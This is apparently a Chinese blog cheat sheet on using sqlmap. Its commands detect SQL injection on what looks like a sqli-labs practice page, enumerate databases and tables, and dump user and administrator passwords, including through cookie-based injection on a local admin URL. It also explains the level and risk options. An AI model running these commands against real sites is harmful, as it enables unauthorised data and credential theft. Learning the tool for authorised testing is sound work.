数据库
首页 > 数据库> > sqlMap使用技巧

sqlMap使用技巧

作者:互联网

猜解是否能注入
python sqlmap.py -u "http://110.40.250.105:8065/Less-6/?id=1"
用于mysq注入
查找数据库
python sqlmap.py -u "http://110.40.250.105:8065/Less-6/?id=1" --dbs
查找数据库下的表(security库)
python sqlmap.py -u "http://110.40.250.105:8065/Less-6/?id=1" -D security --tables
查找表下的列名(security 库下users表的列名)
python sqlmap.py -u "http://110.40.250.105:8065/Less-6/?id=1" -D security -T users --columns
查找字段的值(security 库下users表的"id,password,username"的值)
python sqlmap.py -u "http://110.40.250.105:8065/Less-6/?id=1" -D security -T users -C "id,password,username" --dump
cookie注人
sqlmap.py -u "http://192.168.189.1:81/admin/letter/delsystem?ids=1" --cookie "inxedulogin_sys_user_=inxedulogin_sys_user_1" --dbs --level 2
暴管理员登录密码
sqlmap.py -u "http://192.168.189.1:81/admin/letter/delsystem?ids=1" --cookie "inxedulogin_sys_user_=inxedulogin_sys_user_1" -D demo_inxedu_v2_0_open -T sys_user -C "LOGIN_NAME,LOGIN_PWD,USER_NAME" --dump --level 2

--password 查看数据库所有用户名的密码
--current-user 查看数据库当前用户
--is-dba 判断当前用户是否有管理权限
--roles 列出数据库管理员角色
--current-db 查看当前数据库
补充:--dbs爆所有数据库
爆出指定数据库指定表指定列下的数据 --dump
爆出该网站数据库中的所有数据(--dump-all)

--level 5 设置等级为5,默认是1
默认是1。等级越高,说明探测时使用的payload也越多。其中5级的payload最多,会自动破解出cookie、XFF等头部注入。
当然,等级越高,探测的时间也越慢。这个参数会影响测试的注入点,GET和POST的数据都会进行测试,
HTTP cookie在level为2时就会测试,
HTTP User-Agent/Referer头在level为3时就会测试。
在不确定哪个参数为注入点时,为了保证准确性,建议设置level为5
--risk=3 设置危险等级为3
默认风险等级为1,此等级在大多数情况下对测试目标无害。 风险等级2添加了基于时间的注入测试,等级3添加了OR测试。


https://blog.csdn.net/m0_47418965/article/details/121208978
https://blog.csdn.net/wxq8102/article/details/118627889

 

标签:sqlMap,sqlmap,http,技巧,level,--,py,使用,id
来源: https://www.cnblogs.com/lzstar/p/16468539.html